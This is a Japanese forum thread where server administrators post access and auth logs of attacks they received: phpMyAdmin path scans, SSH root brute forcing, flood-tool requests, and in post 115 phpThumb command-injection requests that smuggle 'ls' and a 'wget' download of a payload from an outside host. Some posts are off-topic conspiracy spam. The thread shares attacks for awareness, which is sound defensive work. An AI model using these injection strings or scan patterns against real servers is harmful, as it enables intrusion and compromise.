68.169.42.240 - - [30/Jul/2011:23:35:28 +0900] "GET //phpMyAdmin-3.0.2.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
91DNS未登録さん:2011/08/02(火) 01:44:45.31 ID:???
68.169.42.240 - - [30/Jul/2011:23:35:28 +0900] "GET //phpMyAdmin-3.1.0.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:28 +0900] "GET //phpMyAdmin-3.1.1.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:29 +0900] "GET //phpMyAdmin-3.1.2.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:29 +0900] "GET //phpMyAdmin-3.1.3.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:29 +0900] "GET //phpMyAdmin-2.9.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.0.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.0.2/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:30 +0900] "GET //phpMyAdmin-2.9.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:31 +0900] "GET //phpMyAdmin-2.9.2/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:31 +0900] "GET //sqlmanager/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:31 +0900] "GET //mysqlmanager/scripts/setup.php HTTP/1.1" 404 228 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //p/m/a/scripts/setup.php HTTP/1.1" 404 221 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //PMA2005/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //pma2005/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:32 +0900] "GET //pma2006/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:33 +0900] "GET //pma2007/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:33 +0900] "GET //pma2008/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:33 +0900] "GET //pma2009/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:34 +0900] "GET //phpmanager/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
92DNS未登録さん:2011/08/02(火) 01:45:10.57 ID:???
68.169.42.240 - - [30/Jul/2011:23:35:34 +0900] "GET //php-myadmin/scripts/setup.php HTTP/1.1" 404 227 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:34 +0900] "GET //phpmy-admin/scripts/setup.php HTTP/1.1" 404 227 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //webadmin/scripts/setup.php HTTP/1.1" 404 224 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //sqlweb/scripts/setup.php HTTP/1.1" 404 222 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //websql/scripts/setup.php HTTP/1.1" 404 222 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:35 +0900] "GET //webdb/scripts/setup.php HTTP/1.1" 404 221 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:36 +0900] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:36 +0900] "GET //mysql-admin/scripts/setup.php HTTP/1.1" 404 227 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:36 +0900] "GET //databaseadmin/scripts/setup.php HTTP/1.1" 404 229 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:37 +0900] "GET //admm/scripts/setup.php HTTP/1.1" 404 220 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:37 +0900] "GET //admn/scripts/setup.php HTTP/1.1" 404 220 "-" "-"

歴代PHPMyAdmin探してるっぽい
93DNS未登録さん:2011/08/02(火) 10:18:21.08 ID:???
>>92
おまえ、気持ち悪い
94DNS未登録さん:2011/08/02(火) 18:05:07.82 ID:???
意味不明ワロチ
95DNS未登録さん:2011/08/02(火) 23:27:35.19 ID:???
>>93
お前馬鹿かスレタイ100回音読しろ

>>85-92は文字量は多いが
アタックのやってきた様子もよくわかる。だから価値アリで問題なし。

     ∩___∩   \ヽ
     | ノ     ヽ   \ \ヽ
     /  ●   ● |    ヽ ヽ \
    |    ( _●_)  ミ    i l  ヽ
   彡、   |∪|   ノ    i l  l i
   / _  ヽノ   )    l i  | l
  (___)     / /    ,,-----、
          / /    |;::::  ::::|
       ⊂二(⌒ )二二二|;::::  ::::|⊃ /', ', ¨
           ̄  ヽ∴。|;::::',ヾ,::::| /。・,/∴
              -:'ヾ|!|!!,i,,!ii,!l,・∵,・、
                 >>93
96DNS未登録さん:2011/08/04(木) 15:30:50.60 ID:???
phpMyAdminアタックが多いわ
97DNS未登録さん:2011/08/11(木) 00:07:30.07 ID:???
外からのアタックではないんだが・・・BINDのスレはあるけど、
DNS全般のスレはなさそうだったので(なくなっちゃった?)。

構内のPCがDNSキャッシュに対して、

ランダム文字列.DHCPの返したドメイン

というクエリを3回続けて出してるログが・・・。
1日数回やらかすこともあれば、やらかなさない日もある。
何がトリガになっているのかも分からない。
もちろんNXDOMAINが返るんだが、カミンスキーでもなさそうだし。
今のところ実害はないけど、なんかちょっと気持ち悪い。

何かご存知の方、いらっしゃいます?
98DNS未登録さん:2011/08/13(土) 10:00:34.54 ID:???
おまえ宇宙人だろ、地球の言葉で書け
99DNS未登録さん:2011/08/14(日) 00:38:20.63 ID:mNJmTQUE
おまえ地球人だろ、宇宙人の言葉で書け
100DNS未登録さん:2011/08/15(月) 01:57:14.43 ID:???
202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
202.75.211.206 [2011.8/14-22:06:33 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
202.75.211.206 [2011.8/14-22:06:36 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
202.75.211.206 [2011.8/14-22:06:39 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
202.75.211.206 [2011.8/14-22:06:40 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
101DNS未登録さん:2011/09/02(金) 20:25:03.05 ID:EWkDqbhU
126.26.247.186 
102DNS未登録さん:2011/09/03(土) 15:39:24.21 ID:???
sdcドメインはクズ。
103DNS未登録さん:2011/11/03(木) 01:26:14.18 ID:lpY38TUY
79.143.179.235 - - [02/Nov/2011:23:49:33 +0900] "GET /webdav/sprint.php?act=phptools&host=66.135.60.226&time=90&port=29465 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:17:19 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=49648 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:21:27 +0900] "GET /webdav/sprint.php?act=phptools&host=2.216.249.129&time=120&port=51349 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:45:24 +0900] "GET /webdav/sprint.php?act=phptools&host=66.246.127.81&time=90&port=80 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:00:52:05 +0900] "GET /webdav/sprint.php?act=phptools&host=81.229.44.61&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:01:00:03 +0900] "GET /webdav/sprint.php?act=phptools&host=90.230.138.205&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"
79.143.179.235 - - [03/Nov/2011:01:09:07 +0900] "GET /webdav/sprint.php?act=phptools&host=83.226.50.111&time=120&port=7171 HTTP/1.1" 200 46 "-" "-"

こんなふうにパラメータ変えてアタックしてくる。
もう1週間くらい同じIPからのアタックが続いてるよ、逆引きすると
backup01.xsltel.me
104DNS未登録さん:2011/11/03(木) 13:25:08.00 ID:???
?(??? ) ?
105DNS未登録さん:2011/11/03(木) 17:40:46.68 ID:???
>103
特定できてるなら、ブロックすりゃ済む話だろ...
106DNS未登録さん:2011/11/03(木) 22:58:30.29 ID:???
このスレはそのアタックNo1してきたURIやら状況を書いて
みんなに参考にしてもらうための情報共有スレなんですけどね
107DNS未登録さん:2011/11/29(火) 14:05:13.01 ID:???
>>105
スレタイ嫁ks
108DNS未登録さん:2011/11/29(火) 20:48:34.88 ID:???
# grep 222.229.65.227 auth.log|head -2
Nov 27 20:27:38 あああ sshd[9857]: Did not receive identification string from 222.229.65.227
Nov 27 20:31:55 あああ sshd[10280]: Failed password for invalid user root from 222.229.65.227 port 35862 ssh2

# grep 222.229.65.227 auth.log|tail -1
Nov 27 21:05:45 あああ sshd[15613]: Failed password for invalid user root from 222.229.65.227 port 43733 ssh2

# grep 222.229.65.227 auth.log|wc
1846 25606 185870

# host iacp-gw.kochi-tech.ac.jp
iacp-gw.kochi-tech.ac.jp has address 222.229.65.227

管理者がんがれ〜。
109DNS未登録さん:2011/12/13(火) 03:47:11.79 ID:???
アタック25
110八犬伝=γδεζηθ=еёжЭЮЯабЧЦХЛθ:2011/12/16(金) 18:10:07.04 ID:bCBmaI9m
2002の「アルゼンチンvsイングランド」と「決勝」を朝鮮総連を騙し、観戦した少頭劣一族のアミ…立て籠り犯 朝鮮総連 少頭劣一族の真の最終目的は 徳川の財産を全て奪い
日本の芸能人を多数 中国へ拉致し、
あちらで更に監禁し働かせ
自分達家族は優雅に国に土地を買い
自分達の国にし遊んで暮らすつもりだった。
日本の芸能人を色々な奴隷にすると言っていた。日本列島は棄てる。
中国へ帰る家族のみが立て籠り犯だ。
次に狙うのはイタリアだったらしい。
おまぬ〜!
フィリピンの范蘭と西太后の所からモンゴルに逃げた『シバ』の子達だ。
111DNS未登録さん:2011/12/18(日) 16:05:00.40 ID:???
同一プロバイダから昨日と今日で3回アタックしてきやがった
114.51.19.152
112Elena Oda Vintevecom Lamcasta:2011/12/19(月) 17:42:04.86 ID:XWUKhFPO
今、まともなサーバーは Googleのみ。
確認するべき。

Googleで
インターネットテレビ 朝鮮総連 少頭劣一族 自民党 立て籠 人質(又はハッキング)
を検索して 各方面に連絡お願い致します。

インターネットテレビ 自分の本名 8桁の生年月日
で自分の犯罪も分かるかも。

掟破りのコピペ犯は私です。
犯罪解決の為に 朝鮮人と華喃 少頭劣一族=蔗冽一族と日本中…更にGoogleで御覧の世界中の方々に閲覧して頂いております。
2チャンも私が貼る場所は閲覧して頂いております。
人質は 世界中の国のトップと国連とFreemason 全メンバーですから…日本中愚か者ばかりで嘆かわしい限り。
113DNS未登録さん:2011/12/20(火) 02:27:06.15 ID:???
韓国人の俺が記念カキコ
114DNS未登録さん:2011/12/22(木) 10:56:56.35 ID:???
毎日同一人物だと思われるksからアタックされ続けている

94.23.45.14 - - [20/Dec/2011:11:31:26 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.35.108 - - [20/Dec/2011:12:06:05 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:13:58:33 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.114.107.0 - - [20/Dec/2011:16:50:56 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
184.173.248.10 - - [20/Dec/2011:18:32:53 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:19:52:26 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.163.199 - - [20/Dec/2011:21:46:59 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
207.109.164.19 - - [20/Dec/2011:22:12:50 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
114.51.163.199 - - [20/Dec/2011:23:43:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.185.197 - - [21/Dec/2011:12:19:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:14:58:07 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
114.51.80.140 - - [21/Dec/2011:16:51:15 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:18:47:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
1.115.18.174 - - [21/Dec/2011:20:44:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
50.19.21.165 - - [21/Dec/2011:21:33:18 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-"
1.115.18.174 - - [21/Dec/2011:22:37:54 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23"
115DNS未登録さん:2011/12/27(火) 05:53:44.16 ID:???
国籍調べたらどうもフランスらしいけど、フランスの糞餓鬼かな コロスぞ ゴラァ

91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /cms/plugins/content/jthumbs/includes/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp
91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tm
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19
91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /libs/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wge
91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /gallery/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.7
116DNS未登録さん:2011/12/27(火) 09:14:56.24 ID:???
>>115
whois情報だとdedicated serverって書いてあるから、
レンタルサーバか何かだろう。

あとphpThumb()と呼ばれるツールの脆弱性を突いて、
サーバ上でコマンドを実行しようとしているところから
すると、おそらく対象のサーバは乗っ取られんではないかな。
117DNS未登録さん:2012/01/09(月) 07:21:01.65 ID:/sz8vKGE
IPアドレス 175.105.126.4
ホスト名 4.126.105.175.ap.yournet.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 種別不明
都道府県 大阪府
IPひろば検索ランキング 17位 (48Point)
118DNS未登録さん:2012/01/09(月) 14:27:12.55 ID:QzdgOEVS
安藤優子、木村太郎は、某プロパイダの社外取締役、かつ、安藤は、フジ社外の人間にもかかわらず、フジテレビジョンのM&Aの最中、フジのホワイトナ
イトの【親会社】の本業を無視して、「インターネットは虚業だ。具体性がない
。」というようなことをコメントしました。この虚業は、livedoorを指していた
としても、「同業者」であったということは、非常に、違和感を感じずには、い
られません。
119DNS未登録さん:2012/01/10(火) 06:06:43.39 ID:???
78.46.89.6 (liventura-grid.com)

2012/01/08,09:41:21,"-",GET,"/muieblackcat","","1.1",403,3075,"-","","-"
2012/01/08,09:41:22,"-",GET,"//index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:23,"-",GET,"//admin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:24,"-",GET,"//admin/pma/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:25,"-",GET,"//db/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:26,"-",GET,"//dbadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:27,"-",GET,"//myadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:28,"-",GET,"//mysql/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:29,"-",GET,"//mysqladmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:30,"-",GET,"//typo3/phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:31,"-",GET,"//phpadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:32,"-",GET,"//phpMyAdmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin/index.php","","1.1",403,3075,"-","","-"
2012/01/08,09:41:33,"-",GET,"//phpmyadmin1/index.php","","1.1",403,3075,"-","","-"
以下pma関係を主に百数十回
120DNS未登録さん:2012/01/10(火) 07:57:02.93 ID:???
>>119
セキュリティホールを突いてくるなんてどこのどいつだよ、
と思ったらドイツだった。
121DNS未登録さん:2012/02/24(金) 15:30:49.31 ID:???
久しぶりに来た
184.105.65.228 guardlayer.com - 2012-02-24 10:06:04 GET /muieblackcat HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/pma/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //db/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //dbadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //myadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //mysql/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //mysqladmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //typo3/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //pma/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //xampp/phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //php-my-admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //websql/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpmyadmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin-2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //php-my-admin/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.3/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.6/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.5.1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.4/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc1/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc2/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.7/index.php HTTP/1.1 404 385 - -
184.105.65.228 guardlayer.com - 2012-02-24 10:06:16 GET //phpMyAdmin-2.5.7-pl1/index.php HTTP/1.1 404 385 - -
122DNS未登録さん:2012/02/24(金) 22:18:52.87 ID:???
>>121
うちでも13時と20時頃に同じのが来てるわ
123DNS未登録さん:2012/02/27(月) 15:21:12.38 ID:6b+wEirL
175.194.234.79 - - [26/Feb/2012:14:10:46 +0900] "R\xb7\x95\xda\x87\x9c\xffX\xa1\xb8\x9d\x04g\x9d\xc0\x9c\x96\xde\x1e\xdd\x18\xf6\\\"\x07\xb1\xed\xcb\xe4\xfbT\xa1\xf3\xe8\x82\x9c\x16@\xfe\x1b\xf3+\xb1" 501 335 "-" "-"
なにこれ怖い
韓国(´・д・`)ヤダ
124DNS未登録さん:2012/03/03(土) 12:42:17.26 ID:???
Googleから大量アクセスの一部
検索用botとはまた違うみたいだ

74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Blackberry8520/5.0.0.822 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (Series40; NokiaC3-00/03.35; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.0.10.15
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - SAMSUNG-GT-C3200/1.0 NetFront/3.5 Profile/M IDP-2.0 Configuration/CLDC-1.1
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Opera/9.50 (J2ME/MIDP; Opera Mini/4.0.8462/8; U; en)
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Nokia6820/2.0 (4.83) Profile/MIDP-1.0 Configuration/CLDC-1.0
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - SoftBank/1.0/920SH/SHJ001 Browser/NetFront/3.4 Profile/MIDP-2.0 Configuration/CLDC-1.1
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - KDDI-CA3A UP.Browser/6.2.0.13.2 (GUI) MMP/2.0
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - DoCoMo/2.0 P906i(c100;TB;W24H15)
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+
74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
125DNS未登録さん:2012/03/11(日) 20:16:26.37 ID:???
70.62.198.26
rrcs-70-62-198-26.central.biz.rr.com
しつこい
126DNS未登録さん:2012/03/13(火) 13:35:01.04 ID:???
荒らしやめろ

ip:218.218.181.166
host:KYNfb-02p1-166.ppp11.odn.ad.jp
UA:Opera/9.80 (Windows NT 6.0; U; ja) Presto/2.10.229 Version/11.61
127DNS未登録さん:2012/03/13(火) 18:02:50.59 ID:???
>126
